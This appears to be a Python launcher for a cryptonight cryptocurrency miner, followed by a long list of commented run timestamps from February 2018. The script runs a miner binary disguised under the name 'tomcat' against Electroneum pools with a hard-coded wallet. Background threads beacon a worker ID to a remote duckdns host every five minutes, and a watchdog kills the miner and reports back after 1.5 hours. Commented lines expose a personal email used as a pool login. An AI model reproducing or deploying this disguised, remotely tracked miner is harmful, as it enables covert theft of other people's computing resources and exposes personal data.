import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:07.696154
#2018-02-17 16:35:08.111001
#2018-02-17 18:22:05.651250
#2018-02-17 20:10:06.056522
#2018-02-17 21:57:05.579829
#2018-02-17 23:42:03.787847
#2018-02-18 01:32:07.378077
#2018-02-18 03:18:06.158903
#2018-02-18 05:07:01.666963
#2018-02-18 06:58:04.763046
#2018-02-18 08:48:04.908231
#2018-02-18 10:35:07.349610
#2018-02-18 12:20:03.596900
#2018-02-18 14:07:03.928866
#2018-02-18 15:57:04.333608
#2018-02-18 17:47:03.983231
#2018-02-18 19:33:03.227670
#2018-02-18 21:18:05.549382
#2018-02-18 23:06:01.941888
#2018-02-19 00:53:05.232803
#2018-02-19 02:40:06.277689
#2018-02-19 04:27:05.684455
#2018-02-19 06:12:04.104225
#2018-02-19 08:01:05.635975
#2018-02-19 09:51:07.593561
#2018-02-19 11:40:09.329512
#2018-02-19 13:28:05.783690
#2018-02-19 15:18:06.392382
#2018-02-19 17:07:05.447956
#2018-02-19 18:52:04.578057
#2018-02-19 20:41:06.048390
#2018-02-19 22:28:05.182174
#2018-02-20 00:13:06.874015
#2018-02-20 02:01:06.520446
#2018-02-20 03:51:04.354369
#2018-02-20 05:35:07.351417
#2018-02-20 07:19:05.492284
#2018-02-20 09:05:07.874167
#2018-02-20 10:48:04.621986
#2018-02-20 12:35:07.614613
#2018-02-20 14:21:08.674691
#2018-02-20 16:04:06.584639
#2018-02-20 17:50:09.757759
#2018-02-20 19:41:01.580439
#2018-02-20 21:28:05.282018
#2018-02-20 23:13:07.984402
#2018-02-21 00:58:04.539910
#2018-02-21 02:44:04.953801
#2018-02-21 04:31:01.847640
#2018-02-21 06:17:07.687234
#2018-02-21 08:03:05.353599
#2018-02-21 09:49:05.253717
#2018-02-21 11:39:05.422972
#2018-02-21 13:27:05.109138
#2018-02-21 15:11:04.408700
#2018-02-21 17:01:01.331695
#2018-02-21 18:49:10.340966
#2018-02-21 20:37:04.902676
#2018-02-21 22:21:08.520796
#2018-02-22 00:12:04.450527
#2018-02-22 02:01:01.974320
#2018-02-22 03:46:08.459308
#2018-02-22 05:33:07.881607
#2018-02-22 07:18:06.893568
#2018-02-22 09:07:01.987413
#2018-02-22 10:55:08.190688
#2018-02-22 12:42:07.584387
#2018-02-22 14:28:06.860062
#2018-02-22 16:14:06.732839
#2018-02-22 17:59:01.930412
#2018-02-22 19:48:04.829984
#2018-02-22 21:37:08.107781
#2018-02-22 23:26:02.176538
#2018-02-23 01:12:07.562205
#2018-02-23 02:58:06.929715
#2018-02-23 04:45:01.648768
#2018-02-23 06:33:04.818682
#2018-02-23 08:19:07.332862
#2018-02-23 10:35:05.042160
#2018-02-23 12:27:03.798670
#2018-02-23 14:14:06.251883
#2018-02-23 16:04:04.758919
#2018-02-23 17:52:01.263440
#2018-02-23 19:38:01.848219
#2018-02-23 21:20:08.117587
#2018-02-23 23:08:05.078711
#2018-02-24 00:55:04.021265
#2018-02-24 02:42:03.630242
#2018-02-24 05:27:06.324210
#2018-02-24 07:14:01.787245
#2018-02-24 09:04:05.350415
#2018-02-24 11:03:07.343285
#2018-02-24 12:52:07.852814
#2018-02-24 14:40:07.185280
#2018-02-24 16:31:05.383362
#2018-02-24 18:21:01.599413
#2018-02-24 20:07:04.350984
#2018-02-24 21:51:06.951795
#2018-02-25 00:51:05.706084
#2018-02-25 04:33:03.779272
#2018-02-25 07:59:01.277786